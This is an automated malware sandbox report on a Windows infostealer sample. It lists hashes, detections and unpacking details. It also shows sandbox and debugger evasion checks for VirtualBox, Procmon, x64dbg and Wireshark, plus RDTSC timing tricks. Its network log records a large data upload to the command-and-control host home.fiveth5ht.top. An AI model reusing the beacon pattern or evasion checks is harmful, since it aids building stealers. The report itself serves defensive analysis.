Windows Analysis Report
w6cYYyWXqJ.exe

Overview

General Information

Sample name: w6cYYyWXqJ.exe (renamed because original name is a hash value)
Original sample name: 26e7c91d9fb68ef0ce54aabc0465a8b0.exe
Analysis ID: 1581212
MD5: 26e7c91d9fb68ef0ce54aabc0465a8b0
SHA1: a2b0aee031cbd7f67d4f86c45354a2715ca0c25c
SHA256: 23569c1720e9dd2b72da3ea832f2a0029c29c8d6b5f3e50caefed0dcbaa605ac
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • w6cYYyWXqJ.exe (PID: 1008 cmdline: "C:\Users\user\Desktop\w6cYYyWXqJ.exe" MD5: 26E7C91D9FB68EF0CE54AABC0465A8B0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: w6cYYyWXqJ.exe | Avira: detected
Source: w6cYYyWXqJ.exe | Virustotal: Detection: 33%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: w6cYYyWXqJ.exe | Joe Sandbox ML: detected
Source: w6cYYyWXqJ.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEA5B0 mov dword ptr [ebp+04h], 424D53FFh
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEA7F0 mov dword ptr [ebx+04h], 424D53FFh
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEA7F0 mov dword ptr [edi+04h], 424D53FFh
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEA7F0 mov dword ptr [esi+04h], 424D53FFh
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEB560 mov dword ptr [ebx+04h], 424D53FFh
Source: w6cYYyWXqJ.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E829FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 561951; Data Raw: [hex dump omitted]
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 31; Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d; Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F4A8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 561951; Data Raw: [hex dump omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; Server: nginx/1.22.1; Date: Fri, 27 Dec 2024 07:38:22 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 207; Connection: close; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; Server: nginx/1.22.1; Date: Fri, 27 Dec 2024 07:38:24 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 207; Connection: close; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: w6cYYyWXqJ.exe, 00000003.00000002.1489724133.0000000007470000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: w6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e6
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: w6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: w6cYYyWXqJ.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: w6cYYyWXqJ.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: w6cYYyWXqJ.exe, 00000003.00000003.1331595263.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443

System Summary

Source: w6cYYyWXqJ.exe | Static PE information: section name:
Source: w6cYYyWXqJ.exe | Static PE information: section name: .idata
Source: w6cYYyWXqJ.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E905B0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E96FA0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F4B180
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EBF100
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F500E0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0120A000
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0120E050
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EE6210
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F4C320
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F50420
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011D4410
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011E6730
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01204780
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8E620
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F4C770
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8A960
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E94940
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F3C900
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0113AB2C
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01014B60
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011F8BF0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8CBB0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01056AC0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0113AAC0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01204D40
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011FCD80
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0120CC90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011D2F90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_0119AE30
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F4EF90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F48F90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EA4F70
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E910E6
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011F35B0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011ED430
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_012117A0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011D56D0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011D9920
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00F39880
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_011F1BD0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00EC1BE0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01203A70
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E9CCD0 appears 53 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 01037220 appears 91 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E9CD40 appears 73 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E8CAA0 appears 62 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00EC50A0 appears 86 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 0105CBC0 appears 94 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E871E0 appears 44 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00EC4F40 appears 302 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E873F0 appears 107 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E875A0 appears 633 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00EC5340 appears 45 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00F644A0 appears 62 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00E8C960 appears 32 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: String function: 00EC4FD0 appears 239 times
Source: w6cYYyWXqJ.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: w6cYYyWXqJ.exe | Static PE information: Section: bzvzmdre ZLIB complexity 0.9944616347353105
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E829FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: w6cYYyWXqJ.exe | Virustotal: Detection: 33%
Source: w6cYYyWXqJ.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: w6cYYyWXqJ.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Section loaded: kernel.appcore.dll
Source: w6cYYyWXqJ.exe | Static file information: File size 4519424 > 1048576
Source: w6cYYyWXqJ.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: w6cYYyWXqJ.exe | Static PE information: Raw size of bzvzmdre is bigger than: 0x100000 < 0x1c3000

Data Obfuscation

Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Unpacked PE file: 3.2.w6cYYyWXqJ.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzvzmdre:EW;syyxadwf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzvzmdre:EW;syyxadwf:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: w6cYYyWXqJ.exe | Static PE information: real checksum: 0x450107 should be: 0x450ccc
Source: w6cYYyWXqJ.exe | Static PE information: section name:
Source: w6cYYyWXqJ.exe | Static PE information: section name: .idata
Source: w6cYYyWXqJ.exe | Static PE information: section name:
Source: w6cYYyWXqJ.exe | Static PE information: section name: bzvzmdre
Source: w6cYYyWXqJ.exe | Static PE information: section name: syyxadwf
Source: w6cYYyWXqJ.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: w6cYYyWXqJ.exe | Static PE information: section name: bzvzmdre entropy: 7.954619105553536

Boot Survival

Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1561927 second address: 156192B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 156192B second address: 1561942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1561942 second address: 156194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEDCB1F6DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 156194C second address: 156195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jc 00007FEEDCB2F2E6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 156195D second address: 1561967 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEDCB1F6DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D897B second address: 16D897F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D897F second address: 16D8987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D8987 second address: 16D898D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D898D second address: 16D8997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16DEF58 second address: 16DEF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16DF271 second address: 16DF27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FEEDCB1F6D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1AC8 second address: 16E1B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e cmc 0x0000000f mov di, 1979h 0x00000013 popad 0x00000014 push 00000000h 0x00000016 cmc 0x00000017 push 1128FCB4h 0x0000001c jg 00007FEEDCB2F2F0h 0x00000022 xor dword ptr [esp], 1128FC34h 0x00000029 pushad 0x0000002a adc si, B1BFh 0x0000002f call 00007FEEDCB2F2F4h 0x00000034 jmp 00007FEEDCB2F2F6h 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov edi, 3CFFDC04h 0x00000040 push 00000003h 0x00000042 mov dword ptr [ebp+122D21D6h], edi 0x00000048 push 00000000h 0x0000004a sub ecx, 6699CC12h 0x00000050 push 00000003h 0x00000052 mov cx, 2366h 0x00000056 call 00007FEEDCB2F2E9h 0x0000005b jg 00007FEEDCB2F2EAh 0x00000061 push esi 0x00000062 pushad 0x00000063 popad 0x00000064 pop esi 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FEEDCB2F2F9h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1B85 second address: 16E1B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
